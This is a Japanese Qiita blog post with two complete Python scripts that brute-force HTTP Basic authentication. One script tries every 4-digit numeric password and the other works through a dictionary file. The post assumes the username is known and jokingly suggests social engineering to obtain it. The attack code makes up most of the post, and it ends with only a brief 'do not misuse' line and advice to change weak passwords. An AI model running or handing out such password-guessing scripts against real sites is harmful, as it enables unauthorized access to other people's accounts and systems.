Qiita Teams that are logged in
You are not logged in to any team

Log in to Qiita Team
Community
OrganizationAdvent CalendarQiitadon (β)
Service
Qiita JobsQiita ZineQiita Blog
Help us understand the problem. What is going on with this article?

PythonでBasic認証へ総当たり攻撃

More than 3 years have passed since last update.

行ったこと

  • 4桁の数字のみを使ったBasic認証への総当たり攻撃
  • 辞書ファイルを使ったBasicn認証への総当たり攻撃

条件

  • パスワード解析のみを行うため,ユーザーIDは知っているという状態
    • わからなかったら,ソーシャルエンジニアリングでもしてください(笑)

環境

  • Python 3

総当たり攻撃(数字4桁)

import urllib.request

def attack_basic(url,user_id):
    for password in range(1,10000):
        password = str(password)
        try:
            pass_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm()
            pass_mgr.add_password(realm=None,uri=url,user=user_id,passwd=password)
            handler = urllib.request.HTTPBasicAuthHandler(pass_mgr)
            opener = urllib.request.build_opener(handler)
            urllib.request.install_opener(opener)
            urllib.request.urlopen(url)
            print("%s is correct!" % password)
        except urllib.request.HTTPError as err:
            print("%s is incorrect" % password)


if __name__ == '__main__':
    url = ""
    user_id = ""
    attack_basic(url,user_id)


総当たり攻撃(辞書ファイル)

import urllib.request

def attack_basic(url,user_id):
    f = open("","r")
    passlist=f.read().splitlines()
    for password in passlist:
        try:
            pass_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm()
            pass_mgr.add_password(realm=None,uri=url,user=user_id,passwd=password)
            handler = urllib.request.HTTPBasicAuthHandler(pass_mgr)
            opener = urllib.request.build_opener(handler)
            urllib.request.install_opener(opener)
            urllib.request.urlopen(url)
            print("%s is correct!" % password)
        except urllib.request.HTTPError as err:
            print("%s is incorrect" % password)


if __name__ == '__main__':
    url = ""
    user_id = ""
    attack_basic(url,user_id)

最後に

  • どちらも悪用厳禁
    • 正直やったところで,ひっかかるWebページは超少ないと思う.
    • これでパスワードがばれるような人は早急に変更しましょう
nekkoneko
メモ書き的な感じで自分の残したいことを書き込んでいます。
Why not register and get more from Qiita?
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away